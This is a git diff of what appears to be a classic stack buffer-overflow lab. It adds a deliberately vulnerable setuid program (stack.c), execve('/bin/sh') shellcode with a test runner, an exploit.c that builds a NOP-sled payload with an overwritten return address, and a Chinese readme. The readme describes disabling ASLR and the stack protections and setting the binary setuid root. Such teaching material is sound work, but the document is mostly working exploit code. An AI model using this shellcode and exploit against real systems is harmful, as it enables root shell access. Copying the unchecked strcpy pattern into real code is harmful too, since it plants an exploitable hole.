init

.gitignore

@@ -0,0 +1 @@
+bin/

call_shellcode.c

@@ -0,0 +1,25 @@
+/* call_shellcode.c */
+/*A program that creates a file containing code for launching shell*/
+#include <stdlib.h>
+#include <stdio.h>
+#include <string.h>
+const char code[] =
+"\x31\xc0" /* Line 1: xorl %eax,%eax */
+"\x50" /* Line 2: pushl %eax */
+"\x68""//sh" /* Line 3: pushl $0x68732f2f */
+"\x68""/bin" /* Line 4: pushl $0x6e69622f */
+"\x89\xe3" /* Line 5: movl %esp,%ebx */
+"\x50" /* Line 6: pushl %eax */
+"\x53" /* Line 7: pushl %ebx */
+"\x89\xe1" /* Line 8: movl %esp,%ecx */
+"\x99" /* Line 9: cdq */
+"\xb0\x0b" /* Line 10: movb $0x0b,%al */
+"\xcd\x80" /* Line 11: int $0x80 */
+;
+int main(int argc, char **argv)
+{
+char buf[sizeof(code)];
+strcpy(buf, code);
+((void(*)( ))buf)( );
+}
+

exploit.c

@@ -0,0 +1,36 @@
+/* exploit.c */
+/* A program that creates a file containing code for launching shell*/
+#include <stdlib.h>
+#include <stdio.h>
+#include <string.h>
+const char shellcode[]=
+"\x31\xc0" /* xorl %eax,%eax */
+"\x50" /* pushl %eax */
+"\x68""//sh" /* pushl $0x68732f2f */
+"\x68""/bin" /* pushl $0x6e69622f */
+"\x89\xe3" /* movl %esp,%ebx */
+"\x50" /* pushl %eax */
+"\x53" /* pushl %ebx */
+"\x89\xe1" /* movl %esp,%ecx */
+"\x99" /* cdq */
+"\xb0\x0b" /* movb $0x0b,%al */
+"\xcd\x80" /* int $0x80 */
+;
+void main(int argc, char **argv)
+{
+	char buffer[517];
+	FILE *badfile;
+	/* Initialize buffer with 0x90 (NOP instruction) */
+	memset(&buffer, 0x90, 517);
+	/* You need to fill the buffer with appropriate contents here */
+	strcpy(buffer + (517 - strlen(shellcode) - 1), shellcode);
+	int offset = 0x24;
+	unsigned long *tmp = (unsigned long *)(buffer + offset);
+	*(tmp) = (0xbffff4c8 + offset + 4 + 1);
+	buffer[516] = 0;
+	/* Save the contents to the file "badfile" */
+	badfile = fopen("./badfile", "w");
+	fwrite(buffer, 517, 1, badfile);
+	fclose(badfile);
+}
+

readme.md

@@ -0,0 +1,20 @@
+
+# 前置条件
+1. 确保kernel.randomize_va_space=0 -> `sysctl -w kernel.randomize_va_space=0`
+2. stack.c编译选项
+   ```
+   $ su root
+   Password (enter root password)
+   # gcc -o stack -z execstack -fno-stack-protector stack.c
+   # chmod 4755 stack
+   # exit
+   ```
+3. exploit.c正常编译
+
+# 具体流程
+
+原理: `strcpy`由于不检查边界，因此会覆盖函数的返回地址。函数返回是，会读取覆盖的返回地址中的指令执行，即执行shellcode。
+
+1. 使用gdb调试确定缓冲区地址addr
+2. 计算 **buffer地址** 与 **函数返回地址** 的距离offset
+3. 攻击字符串`str+offset = addr+offset+4+1`，其余为`0x90`无操作

stack.c

@@ -0,0 +1,24 @@
+/* stack.c */
+/* This program has a buffer overflow vulnerability. */
+/* Our task is to exploit this vulnerability */
+#include <stdlib.h>
+#include <stdio.h>
+#include <string.h>
+int bof(char *str)
+{
+	char buffer[24];
+	/* The following statement has a buffer overflow problem */
+	strcpy(buffer, str);
+	return 1;
+}
+int main(int argc, char **argv)
+{
+	char str[517];
+	FILE *badfile;
+	badfile = fopen("badfile", "r");
+	fread(str, sizeof(char), 517, badfile);
+        bof(str);
+	printf("Returned Properly\n");
+	return 1;
+}
+